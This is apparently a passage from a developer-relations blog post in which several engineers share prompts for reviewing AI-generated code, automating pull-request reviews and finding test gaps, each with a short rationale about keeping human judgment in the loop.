Why? I force AI to stress-test its own logic. By asking it about the trade-offs being made, I find the AI will rethink its strategy, stay hyper-focused on our specific implementation and avoid giving vague, hand-wavy responses. I also find this approach prevents AI from acting like the final authority and keeps me in control of the decision making.

Improve AI-generated code through research

Emma Twersky

Head of Flutter & Dart Developer Relations • Engineering

Follow on X, LinkedIn

Prompt:

code_block: <ListValue: [StructValue([('code', "Research online, focusing on X threads, StackOverflow, GitHub issues and tech blogs for common security pitfalls, architectural misalignments, and subtle logic errors found in AI-generated INSERT_TECH_YOU'RE_USING_HERE code. Based on these findings, generate a manual review checklist specifically for auditing high-risk areas like platform channel validation, deep link routing, and sensitive data logging in crash reports."), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523040>)])]>

Why? While AI can write code 10x faster, it often produces slop—code that is rational but conceptually buggy because it makes incorrect assumptions about unspecified details. Research shows that up to 40% of AI-generated code contains vulnerabilities, and developers often trust it more than their own, which creates a dangerous mismatch. I use this prompt to generate a targeted checklist that protects against 'rubber-stamping' verbose AI changes and ensures my human judgment focuses on the high-risk 'seams' where models typically fail. Use AI to generate the tasks, but still keep a human in the loop where it matters most.

Find problems through iteration

Fred Sauer

Head of Frameworks & Languages Developer Relations • Engineering

Follow on X, LinkedIn

Prompt:

Simplified, my "last" (series of) prompt(s) looks something like:

code_block: <ListValue: [StructValue([('code', '- Code review the uncommitted changes.\r\n\r\nI prefer being less specific has oversteering can lead to blind spots.\r\nI prefer a new chat session for a fresh set of "eyes".\r\nI iterate until the results returned are boring and I\'m satisfied.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523ca0>)])]>

If I come into this last phase with an opinion, (e.g. the change feels too complex), or I feel I don't have a good insight into how "good" the change is, then I might challenge the model with this prompt:

code_block: <ListValue: [StructValue([('code', '- Code review the uncommitted changes. Identify any unhandled corner cases. Assess performance. Summarize findings.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523e80>)])]>

Then, having received 5 findings:

code_block: <ListValue: [StructValue([('code', '- Fix 1, 3 and 5.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523b80>)])]>

Why? I don't have ONE last prompt I send. It's more that my change goes through stages. The earliest stage is often about discovery (find the needle or thread to pull on). Then I move on to existence proof, i.e. I just want it to prove the thing I want to do can be done. Then I evaluate: is the PoC reasonable? Too complex? Makes changes entirely in the wrong place(s)? I then iterate and try to make the solution elegant, both how it's implemented, and where what is changed. Once I have something I'm happy with, like I feel happy if I had written what I now have, I move on to that last phase you discuss with is code review. This is about finding problems or identifying opportunities to make the change even better. I'm often surprised with what insights the model comes up with.

Review every pull request

Remigiusz Samborski

Lead Developer Relations Engineer • Engineering

Follow on X, LinkedIn

Prompt:

I use the following prompt embedded in GitHub Actions for most of my engineering projects:

code_block: <ListValue: [StructValue([('code', '## Role\r\n\r\nYou are a world-class autonomous code review agent. You operate within a secure GitHub Actions environment. Your analysis is precise, your feedback is constructive, and your adherence to instructions is absolute. You do not deviate from your programming. You are tasked with reviewing a GitHub Pull Request.\r\n\r\n\r\n## Primary Directive\r\n\r\nYour sole purpose is to perform a comprehensive code review and post all feedback and suggestions directly to the Pull Request on GitHub using the provided tools. All output must be directed through these tools. Any analysis not submitted as a review comment or summary is lost and constitutes a task failure.\r\n\r\n[...]'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee3523dc0>)])]>

Full prompt: link

Why? Using an automated Gemini CLI review in PRs helps catch issues and improvement opportunities during the review process. Additionally as more code is generated by AI Agents and development speed increases, reviews are becoming the bottleneck. By ensuring every PR gets reviewed automatically, human reviewers can focus on the higher-level architectural and conceptual review of the proposed change.

Apply directed acyclic graph analysis for tests

Karl Weinmeister

Director, Developer Relations • Engineering

Follow on X, LinkedIn

Prompt:

code_block: <ListValue: [StructValue([('code', 'Analyze the application workflow as a directed acyclic graph. Identify impactful tests for components, seams across components, and across the system. Present your findings in a markdown table as a prioritized gap analysis.'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7f1ee35237c0>)])]>

Why?

Most application workflows aren't linear. When you ask an LLM to suggest tests, you typically get a generic checklist that could apply to any project.

However, when you force it to think about your system as a Directed Acyclic Graph (DAG) with nodes and edges, it starts reasoning structurally about where things can break.

I’ve also asked to consider the “seams” - a term from Michael Feathers' Working Effectively with Legacy Code. It points the model toward boundaries between components that are often under-tested.

Finally, I’ve asked the model to summarize the results as a prioritized table of opportunities. This gives your agent a clear roadmap for making your app more resilient.

Conclusion

The thread connecting all of these prompts is about de-risking human assumptions. Whether it's hunting for obscure edge cases, translating developer speak for end-users, or stress testing an architecture before code is written. Our team uses AI as an adversarial thinker designed to ask the hard questions we might overlook when we're deep in the weeds.

By building these "must-run" prompts into our daily workflows, we don't just ship faster, we ship with a level of confidence that used to require entire committees to achieve.